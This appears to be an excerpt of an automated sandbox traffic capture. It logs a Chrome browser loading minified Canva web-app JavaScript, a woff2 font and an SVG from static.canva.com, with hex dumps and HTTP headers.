                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 6c 69 65 6e 74 26 26 74 68 69 73 2e 63 6c 69 65 6e 74 2e 51 37 28 74 68 69 73 2e 73 74 6f 72 65 2c 61 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 29 7b 68 4e 63 2e 46 28 74 68 69 73 29 3b 74 68 69 73 2e 73 74 6f 72 65 3d 61 3b 74 68 69 73 2e 63 6c 69 65 6e 74 3d 62 7d 7d 3b 76 61 72 20 69 4e 63 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 67 4e 63 7b 73 74 61 74 69 63 20 46 28 61 29 7b 5f 5f 63 2e 50 28 61 2c 7b 5a 69 61 3a 63 36 2c 51 37 3a 63 36 7d 29 7d 61 73 79 6e 63 20 69 6e 69 74 69 61 6c 69 7a 65 28 61 2c 62 2c 63 29 7b 61 77 61 69 74 20 59 4d 63 28 74 68 69 73 29 3b 63 26 26 73 65 74 54 69 6d 65 6f 75 74 28 61 73 79 6e 63 28 29 3d 3e 24 4d 63 28 74 68 69 73 2c 61 2c 74 68 69 73 2e 62 6f 6f 74 73 74 72 61 70 2e 75 73 65 72 49 64 29 2c 35 45
                                                                                                                                                                                                                                                                    Data Ascii: lient&&this.client.Q7(this.store,a)}constructor(a,b){hNc.F(this);this.store=a;this.client=b}};var iNc=class extends gNc{static F(a){__c.P(a,{Zia:c6,Q7:c6})}async initialize(a,b,c){await YMc(this);c&&setTimeout(async()=>$Mc(this,a,this.bootstrap.userId),5E
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 65 71 5f 5f 28 33 35 33 32 37 39 29 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 32 30 31 30 39 39 29 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 39 31 36 34 29 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 35 35 32 38 35 39 29 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 33 32 33 30 32 38 29 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 32 37 37 34 32 35 29 3b 73 65 6c 66 2e 5f 34 35 66 37 38 35 33 64 63 37 36 36 30 33 37 38 61 30 33 38 39 35 32 62 35 33 63 30 39 35 33 65 20 3d 20 73 65 6c 66 2e 5f 34 35 66 37 38 35 33 64 63 37 36 36 30 33 37 38 61 30 33 38 39 35 32 62 35 33 63 30 39 35 33 65 20 7c 7c 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 5f 63 29 20 7b 76 61 72 20 6b 62 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 61 5d 3b 6c 65 74 20 62 3d 30 3b 66 6f 72 28 3b 61 2e 6c
                                                                                                                                                                                                                                                                    Data Ascii: eq__(353279);__web_req__(201099);__web_req__(9164);__web_req__(552859);__web_req__(323028);__web_req__(277425);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var kbc=function(a){a=[a];let b=0;for(;a.l
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 64 65 78 22 29 2e 67 65 74 41 6c 6c 28 22 6e 75 6c 6c 22 29 29 3b 62 3d 28 62 3d 28 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 64 29 29 2e 66 6c 61 74 28 29 29 3f 62 2e 6d 61 70 28 65 3d 3e 5f 5f 63 2e 64 44 2e 64 65 73 65 72 69 61 6c 69 7a 65 28 65 2e 65 76 65 6e 74 29 29 3a 5b 5d 3b 61 77 61 69 74 20 61 2e 64 5f 3b 72 65 74 75 72 6e 20 62 7d 2c 71 62 63 3d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 2e 6f 62 6a 65 63 74 53 74 6f 72 65 28 22 61 6e 61 6c 79 74 69 63 73 5f 65 76 65 6e 74 5f 76 32 22 29 3b 62 3d 62 2e 6f 62 6a 65 63 74 53 74 6f 72 65 28 22 61 6e 61 6c 79 74 69 63 73 5f 65 76 65 6e 74 5f 6d 65 74 61 64 61 74 61 22 29 3b 63 6f 6e 73 74 20 5b 64 2c 65 5d 3d 61 77 61 69 74 20 50 72 6f 6d 69 73 65
                                                                                                                                                                                                                                                                    Data Ascii: dex").getAll("null"));b=(b=(await Promise.all(d)).flat())?b.map(e=>__c.dD.deserialize(e.event)):[];await a.d_;return b},qbc=async function(a,b){var c=b.objectStore("analytics_event_v2");b=b.objectStore("analytics_event_metadata");const [d,e]=await Promise
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 72 20 61 3d 6e 61 76 69 67 61 74 6f 72 2e 6c 6f 63 6b 73 2c 0a 62 3d 73 62 63 3b 72 65 74 75 72 6e 20 63 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 64 3d 3e 7b 61 2e 72 65 71 75 65 73 74 28 62 28 63 29 2c 28 29 3d 3e 7b 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 29 3d 3e 7b 7d 29 7d 29 7d 29 7d 2c 77 62 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 61 76 69 67 61 74 6f 72 2e 6c 6f 63 6b 73 7c 7c 28 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 30 3a 61 2e 64 74 62 29 3f 75 62 63 28 29 3a 76 62 63 28 29 7d 2c 73 62 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 73 77 69 74 63 68 28 61 2e 74 79 70 65 29 7b 63 61 73 65 20 22 73 74 61 74 69 63 22 3a 72 65 74 75 72 6e 20 61 2e 6e 61
                                                                                                                                                                                                                                                                    Data Ascii: r a=navigator.locks,b=sbc;return c=>new Promise(d=>{a.request(b(c),()=>{d();return new Promise(()=>{})})})},wbc=function(a){return null==navigator.locks||(null===a||void 0===a?0:a.dtb)?ubc():vbc()},sbc=function(a){switch(a.type){case "static":return a.na
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 6f 6e 65 72 72 6f 72 3d 28 29 3d 3e 64 28 45 72 72 6f 72 28 22 46 61 69 6c 65 64 20 74 6f 20 6c 6f 61 64 20 55 52 4c 3a 20 22 2b 62 29 29 3b 65 2e 73 72 63 3d 62 3b 61 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 2c 46 62 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 66 74 29 7b 63 6f 6e 73 74 20 62 3d 5f 5f 63 2e 64 7a 28 5f 5f 63 2e 63 7a 28 5f 5f 63 2e 62 7a 28 5b 22 68 6d 2e 6a 73 22 5d 29 2c 61 2e 63 6f 6e 66 69 67 2e 6c 73 2c 21 30 29 29 3b 61 2e 66 74 3d 61 2e 59 53 61 28 61 2e 64 6f 63 75 6d 65 6e 74 2c 0a 60 24 7b 45 62 63 7d 24 7b 62 7d 60 29 2e 63 61 74 63 68 28 28 29 3d 3e 7b 61 2e 66 74 3d 76 6f 69 64 20 30 7d 29 7d 7d 2c 47 62 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 64 61 74 61 4c 61 79 65
                                                                                                                                                                                                                                                                    Data Ascii: onerror=()=>d(Error("Failed to load URL: "+b));e.src=b;a.body.appendChild(e)})},Fbc=function(a){if(!a.ft){const b=__c.dz(__c.cz(__c.bz(["hm.js"]),a.config.ls,!0));a.ft=a.YSa(a.document,`${Ebc}${b}`).catch(()=>{a.ft=void 0})}},Gbc=function(a,b){a.dataLaye
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 70 65 6e 64 43 68 69 6c 64 28 62 29 7d 7d 2c 64 31 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 22 79 65 73 22 3a 22 6e 6f 22 7d 2c 48 62 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 7b 7d 3b 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 61 29 2e 66 6f 72 45 61 63 68 28 28 5b 63 2c 64 5d 29 3d 3e 7b 76 6f 69 64 20 30 21 3d 3d 64 26 26 28 62 5b 63 5d 3d 64 29 7d 29 3b 72 65 74 75 72 6e 20 62 7d 2c 4c 62 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 7b 7d 3b 66 6f 72 28 63 6f 6e 73 74 20 5b 63 2c 64 5d 6f 66 20 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 61 29 29 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 64 29 3f 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 64 5b 30 5d 3f 62 5b 63 5d 3d
                                                                                                                                                                                                                                                                    Data Ascii: pendChild(b)}},d1=function(a){return a?"yes":"no"},Hbc=function(a){const b={};Object.entries(a).forEach(([c,d])=>{void 0!==d&&(b[c]=d)});return b},Lbc=function(a){const b={};for(const [c,d]of Object.entries(a))Array.isArray(d)?"string"===typeof d[0]?b[c]=


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    84192.168.2.1249806104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC587OUTGET /web/images/cff149ee1e9d2be50ac77bcd86769d05.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1353INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                                                                    Content-Length: 38848
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951302dd45e76-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Age: 1946565
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "cff149ee1e9d2be50ac77bcd86769d05"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:31 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 11 Sep 2024 10:59:16 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 12 Sep 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: DYcqRxpLxXIhF9SgV0HCcaG8g2+7oahJsNRo8Sjhs0JuHpZTcrESKxE70rxZBENcLJv8XDURLPk=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: JRDCCS8JMWGYVS0Z
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 3dCxs8UrAWF3nyYbBS0P29FBI5qsgg13
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC779INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 5f 33 4c 58 79 78 54 79 5a 37 6f 52 73 6a 64 76 6f 6f 75 6b 72 6a 65 4f 52 39 51 72 43 61 31 4e 77 42 66 75 61 77 45 38 6e 6f 59 2d 31 37 33 32 31 31 34 39 30 35 2d 31 2e 30 2e 31 2e 31 2d 68 37 62 6e 35 47 79 58 67 44 54 73 4b 79 51 66 58 49 78 66 5f 58 4d 35 63 63 4a 63 6b 37 68 53 4d 30 6d 77 35 69 42 70 33 4b 41 33 64 43 41 55 4e 32 5a 4a 68 46 44 78 73 61 5a 45 38 4d 56 71 75 76 56 41 4b 79 37 74 65 35 67 59 4e 59 64 6e 34 61 49 49 70 51 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 34 20 31 35 3a 33 31 3a 34 35 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=_3LXyxTyZ7oRsjdvooukrjeOR9QrCa1NwBfuawE8noY-1732114905-1.0.1.1-h7bn5GyXgDTsKyQfXIxf_XM5ccJck7hSM0mw5iBp3KA3dCAUN2ZJhFDxsaZE8MVquvVAKy7te5gYNYdn4aIIpQ; path=/; expires=Wed, 20-Nov-24 15:31:45 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC606INData Raw: 77 4f 46 32 00 01 00 00 00 00 97 c0 00 13 00 00 00 01 25 28 00 00 97 4c 00 01 02 8f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 88 11 1b 81 91 6a 1c 90 18 3f 48 56 41 52 88 5e 3f 4d 56 41 52 5a 06 60 3f 53 54 41 54 24 27 28 00 83 4e 2f 81 00 0a ff 44 e6 7c 30 81 fc 00 01 36 02 24 03 87 7c 0b 84 00 00 04 20 05 85 3e 07 20 5b 94 15 71 80 a1 57 1d 8c db 06 f0 73 67 74 59 7f 8d 8a b1 0b 43 cf 6d e3 c8 58 3d 65 9d 8d 88 60 e3 00 08 7e 39 cc f8 ff 3f 2d e9 90 a1 09 ee 01 68 5b 55 e7 74 bb 2d 88 5c 14 91 51 de 7a 6b 6d d4 c8 2c cf d9 6b 16 cd b1 52 50 34 da d0 b1 a3 25 5a 23 5f 31 71 08 11 19 48 a7 10 f9 41 87 50 cd 54 0e 73 23 0f b8 51 e8 11 11 3b cf d3 0f f1 84 0c d7 5b a6 dc 17 48 7c aa 85 43 08 b4 c0 ce 69 0c a1 e3 ec 41 57 ba e5 fe b9 56
                                                                                                                                                                                                                                                                    Data Ascii: wOF2%(Lj?HVAR^?MVARZ`?STAT$'(N/D|06$| > [qWsgtYCmX=e`~9?-h[Ut-\Qzkm,kRP4%Z#_1qHAPTs#Q;[H|CiAWV
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 60 b2 42 d7 38 b5 f6 44 ed 45 5c 56 c4 28 35 2a 81 00 89 4f 32 f3 d3 37 e7 ff 39 33 b3 3a d9 6c 36 0a 24 84 42 c5 04 b8 f7 3e f7 5f ff f8 d6 39 bb a4 46 45 1c af a4 a5 9e aa ca ff e8 56 fd c0 cc 0a 8c b8 06 d1 c4 31 09 84 84 30 41 6c 8d 35 67 3d ec 99 b4 f7 ae a8 bc 3a 2f ba ab d7 4c 08 a5 33 e9 b5 62 0f 02 13 a0 fd fc 37 e7 ff af 08 12 b4 f4 20 b7 e5 aa d9 13 fd fa 6a c8 15 ff 75 ef 11 a3 46 29 84 86 84 10 9f c8 98 65 b2 67 8f 58 66 22 43 b8 b2 65 95 0d d3 33 3d a4 9f 23 a2 7f c3 79 8b c3 ff 77 fc ef 1e 49 fb 40 86 4f 10 3e 10 4a 0b 24 18 8d ba b9 ba 88 2e f7 7b 53 df 56 02 e0 93 65 38 42 2e 1d 20 15 22 4a 39 ce 11 44 44 14 22 32 37 6b 22 56 44 ac 88 28 c2 13 d8 7d ce fa 00 4c 48 54 ed fb bb 61 e5 36 2d ac ea a4 88 ff 72 a4 89 6d 7e b2 2e c0 01 81 16 b7
                                                                                                                                                                                                                                                                    Data Ascii: `B8DE\V(5*O2793:l6$B>_9FEV10Al5g=:/L3b7 juF)egXf"Ce3=#ywI@O>J$.{SVe8B. "J9DD"27k"VD(}LHTa6-rm~.
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: f7 ee b9 07 d7 67 ef 7b 6d b6 29 76 3a 99 eb cf cf a4 3b b4 ba 3d 83 da 98 d4 31 5d c4 b4 8a 59 19 bb 8b 78 0b a6 e3 bd 91 7e 19 1c 90 dc 5d 24 6e 91 0c 76 c6 a6 98 b0 72 e2 9d 2e fa 9b 93 57 af 65 30 a6 11 d1 2a 9f 8e 8e e6 a4 9e cb 6c 6e 85 63 56 0b 87 3a ee 62 f1 b6 c3 c5 db 8e 76 56 f7 53 12 7b e6 72 c7 4d 76 5c ee bd 94 0a 06 49 00 a3 20 9f ad b0 d5 4a 5a df 70 d6 af b6 ef 5e ed bc f2 88 f1 ef 5b d8 ea 76 72 71 bb b0 77 bb bc 7d bb 12 0a c5 9d db 4b 5b 77 13 8f 5f a3 c6 0a 7d e7 1a b3 be cb fd 49 29 5e dc cf ac 3f 9f f9 ff 17 1c 2f c7 85 ff 7d 11 59 12 d2 12 b1 de cc f0 55 73 3f 8c ad 45 d6 35 af 4b bb ce 89 58 49 dd 18 eb 9b 13 7f ad 4f ac e9 8b c8 73 b3 10 d1 99 d7 7a ce 9e ba 37 7c be 7a fb db 95 10 10 02 00 82 75 d4 57 a3 34 a1 99 d3 04 08 00 4d
                                                                                                                                                                                                                                                                    Data Ascii: g{m)v:;=1]Yx~]$nvr.We0*lncV:bvVS{rMv\I JZp^[vrqw}K[w_}I)^?/}YUs?E5KXIOsz7|zuW4M
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 93 7b 30 4f 9f d5 28 2d 7b 39 3d 08 19 74 14 ac bb 8d 17 23 5b 2e 4d 38 68 ca 77 06 50 50 72 48 56 81 60 ca ee 63 bc fb 48 51 ff c5 43 b4 7b 85 1c 62 3e e7 7d 84 b2 58 fa 1b 1e e8 b6 82 5b b5 7e 57 04 70 95 74 4d 4f 9e 9d ee 9d 9a 6e d3 75 ea 43 66 0c 7f b0 cc 4e 4e 54 2f 5c f1 3b 5f 87 71 a3 81 0e 8d 03 5f 66 9a 58 53 5f 43 68 71 a5 7b de d6 eb 15 57 5a f6 92 50 64 81 ed 06 f2 0d 7f cd 38 6b 96 59 db e6 b4 1b 59 7b 73 6a ca 74 17 82 9b 35 bd 1f 38 a7 8b 5c d9 f1 23 3a 4b 81 cb 82 d2 1e 75 eb e1 49 6c 88 4b 98 80 f6 b4 e4 88 e7 cf 80 90 43 52 35 7e a1 a4 9d 94 91 71 21 4c ac 47 87 65 34 9f 7a a5 ad 90 d4 c4 1b 2f d8 21 ed 2f 37 0a ca f9 f9 0c 0f 03 b2 23 98 ee 78 40 79 95 89 81 ce 72 5f 8b 2b 36 b4 5d 1d a9 6d 8a 33 da 3c 85 6d 1c 30 ea 36 77 78 07 75 59
                                                                                                                                                                                                                                                                    Data Ascii: {0O(-{9=t#[.M8hwPPrHV`cHQC{b>}X[~WptMOnuCfNNT/\;_q_fXS_Chq{WZPd8kYY{sjt58\#:KuIlKCR5~q!LGe4z/!/7#x@yr_+6]m3<m06wxuY
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 6e eb a2 ea 2f d3 22 96 10 d0 0e 99 52 24 77 b6 2f 99 4c 2f 6b c0 11 f3 e3 d8 1c d9 12 64 87 c1 38 42 4b 6b 65 51 60 a3 8b 9f 2e 9b 04 f4 c0 df d3 ac f6 14 7d 70 82 b1 56 90 62 16 20 99 34 47 07 fa 88 e0 b0 8e e0 e4 0e e2 60 a8 e7 d8 b1 6b 23 84 ad 7f 56 c4 b3 45 cd 4b 75 0f fd f0 90 4b a4 70 70 10 05 3f ec cc 33 58 bc 35 8f ea b1 1a 38 73 ea 19 82 f4 14 45 9a ca d2 94 00 6d 37 4f 2b 64 6b fa bf 6c 48 d9 e4 96 a0 9a d1 f2 54 01 c2 6b cd 15 62 1f 41 71 a1 65 3c 52 9b 6a 13 b7 ae 7e 4a 58 b1 45 7e 50 32 9f 39 cb ec 0e 43 8e 99 6c 60 56 01 b5 a1 b0 fc fb 45 fb c5 ab 4d 8a 07 19 72 70 a5 3e 89 b1 b7 98 be 0a 79 91 15 d9 55 cf 3c 80 80 10 b8 ee a3 ad b1 fb fb 1d dc e8 c8 92 49 85 3b b9 77 37 45 d5 48 94 7f 93 f6 6e e4 0a 43 86 1b 49 d8 ac 37 e2 8d f4 bd e7 65
                                                                                                                                                                                                                                                                    Data Ascii: n/"R$w/L/kd8BKkeQ`.}pVb 4G`k#VEKuKpp?3X58sEm7O+dklHTkbAqe<Rj~JXE~P29Cl`VEMrp>yU<I;w7EHnCI7e
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 22 e6 08 98 af f9 3a af f9 76 8c 1d e0 6f 27 2a bb f0 b7 fb 44 95 3d f6 52 b2 c1 33 11 fd be 13 93 02 98 e2 b0 db 49 29 b7 a2 e2 5a e0 e3 4d 68 c1 44 4f 5c 05 27 1c fe 04 54 9c 09 91 43 5f 19 54 c1 53 b4 71 68 4a 0b c3 3f 04 55 99 5a 88 87 de 69 dc 86 78 13 44 1b 82 2e 48 48 08 fa f0 85 c6 5d 58 28 e1 61 45 c4 43 e4 53 5b d1 f1 64 e4 b8 8a 86 88 1f 29 a5 60 1a 81 fc 04 09 30 8d 0b 9f e3 a2 8d a8 ad 89 af ce f8 da 1c 89 ae a7 e4 88 71 21 a7 20 a7 38 32 e3 3c 71 75 a4 2f 65 c9 2f b1 5f 00 4f 36 bc 77 cf 63 42 82 71 43 89 08 02 4b 59 dd ed 98 82 70 c0 25 91 a8 0f 66 cd 02 14 52 96 a3 21 c2 ad 03 15 c3 12 c4 50 0b e0 ce f8 d1 83 7a a0 02 21 79 44 cb 81 fa 16 9a 25 f4 e9 9a 37 82 11 21 d1 0b 20 17 a4 ac b3 d0 04 26 6d 5c 2e c9 dd 0b e1 6d 3d 96 73 2a 43 b3 32
                                                                                                                                                                                                                                                                    Data Ascii: ":vo'*D=R3I)ZMhDO\'TC_TSqhJ?UZixD.HH]X(aECS[d)`0q! 82<qu/e/_O6wcBqCKYp%fR!Pz!yD%7! &m\.m=s*C2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 09 3d 5c 12 a5 bf ab 84 87 15 3a e5 ac a0 81 76 bf 99 1d f4 71 98 93 9c e2 26 3f f3 87 b3 25 88 9f 60 36 16 60 85 b7 6d 80 28 c2 9a 53 94 ac 6d a2 32 1f 55 91 09 09 cf 15 91 92 bf 92 07 b7 fa 46 c8 2c 17 ed d0 20 21 11 45 5f 21 43 e2 5a 2e c1 62 e2 8d 90 4a e9 1c 86 14 0b f1 3a cb 4f 4c 12 fb 02 18 aa 21 a6 69 03 25 16 64 2d cc 8c 0c b2 32 32 b4 80 3f 28 c9 c8 d0 4a 14 9c c9 e8 bc cf 8a 6c 5d 09 1c 69 0a 0e 9c 7f b7 07 9d 64 79 8a 54 a8 bb ee 5e 9b 6e 7d 06 5d 34 6a b2 88 8a a2 e8 4b e2 74 62 7e 59 52 da 4a 63 d4 c6 78 02 5a fb 91 e0 bd 2a 0f 1a 46 d0 28 94 48 4a 48 3c bd 1c 96 d2 86 b3 58 6e 19 4d a5 d6 19 68 f3 cb 18 a1 88 f7 a3 46 47 e7 f1 d7 fa 4c bf 2a 81 b8 cd 9f c5 9b 29 28 4f 63 ab 42 d7 8a ff 48 f5 47 98 6a c4 79 64 11 0e ac b6 88 c7 48 95 67 a4
                                                                                                                                                                                                                                                                    Data Ascii: =\:vq&?%`6`m(Sm2UF, !E_!CZ.bJ:OL!i%d-22?(Jl]idyT^n}]4jKtb~YRJcxZ*F(HJH<XnMhFGL*)(OcBHGjydHg
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: ae f3 ab d7 57 ad 6d 63 7d 7b bf 7b d1 4e 1f bd 61 e3 96 e5 47 e9 3b fd 9d bb 78 f4 bd 67 d9 f7 83 bd 17 83 97 1c 89 91 97 8d c7 07 77 cc 1d bc 08 65 ef ef 88 8f 5e 1b 8f ff 21 1e ee 98 87 a3 c1 a3 ec f0 0e 0c bf 74 2d 9d 7e 73 66 f0 38 2d 09 d9 fa 29 e4 55 2c fa 36 cc 7c 50 15 1a 8d e1 2f 7f b4 52 7e bc 52 5e ae 0d bf 96 ba b2 f1 a1 73 97 36 5e 7f 6e 8b 3d b8 63 f9 fe 8e 3a b8 b3 b9 73 17 ec cb 70 a8 44 c3 7b 66 46 f7 c1 5d 9d ce 6d eb 8f 5f 20 bd f2 02 e9 f1 8b da d9 dd a5 0b 2f 96 3a b4 15 bd 7d e4 78 fa f6 d2 e9 3b 4b 97 9e 95 98 73 d3 42 cf 6b dd a9 f0 31 d7 d5 e7 ef 38 e4 53 37 1c d7 ee 71 52 ef a4 c9 da 46 f3 4e 47 bf 47 d2 5e 94 6e b2 af 13 44 e2 c0 62 80 3f e4 6e b6 fe 86 9d 7b f6 61 22 6a f4 37 5d 98 06 5e ea d9 72 05 0f f6 9b 0c a2 d1 b6 aa 73
                                                                                                                                                                                                                                                                    Data Ascii: Wmc}{{NaG;xgwe^!t-~sf8-)U,6|P/R~R^s6^n=c:spD{fF]m_ /:}x;KsBk18S7qRFNGG^nDb?n{a"j7]^rs
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: bf 7b 16 49 a9 1b db b9 84 14 89 26 9b d8 51 2c 87 ac c0 5a f9 18 a7 3c be 71 8d 9f dd 7e d4 9e 7c 99 58 95 a7 46 bb 1d 1b 3d fa 57 d0 a4 c6 31 6c 34 71 b4 12 5a cd a8 8e 99 74 6a 46 87 90 b4 a1 ba a8 41 50 ff 50 e1 5d fb ee c7 ea 15 cb 04 cb c0 ea ec ab b5 61 35 cc d4 a1 52 9f d4 3a 7f 20 08 49 a2 e5 e7 f1 f2 12 2f 0e be 07 2f 2c d2 12 2d b8 66 22 f8 a9 07 06 a3 6a 09 90 22 64 79 b9 80 b8 8e ea cb 22 fe d7 2d 8e 7c 9e a2 9b f9 4d 40 34 1d 60 b5 af 48 90 2f 9f 68 b2 8e e0 5f 2d b4 45 f4 4f 3e f7 f0 8f 82 f6 86 48 d1 03 95 1c 32 06 95 f7 40 89 cb 02 e5 09 a9 16 8b 25 e9 7e d2 7e e8 75 38 ed d7 9e 5f 14 5f af 7c 8a e8 18 d1 d8 53 2f 51 4f ad ae b5 09 f9 ec 1f f6 a7 31 de 1b 2c 68 d9 df 2b 0e 38 d4 e6 ff a4 aa b9 4f 17 d8 3f b3 9d ff b5 c5 ee f0 f8 57 79 1e
                                                                                                                                                                                                                                                                    Data Ascii: {I&Q,Z<q~|XF=W1l4qZtjFAPP]a5R: I//,-f"j"dy"-|M@4`H/h_-EO>H2@%~~u8__|S/QO1,h+8O?Wy


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    85192.168.2.1249810104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC871OUTGET /web/images/0483f2b648dcc986d01385062052ae1c.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
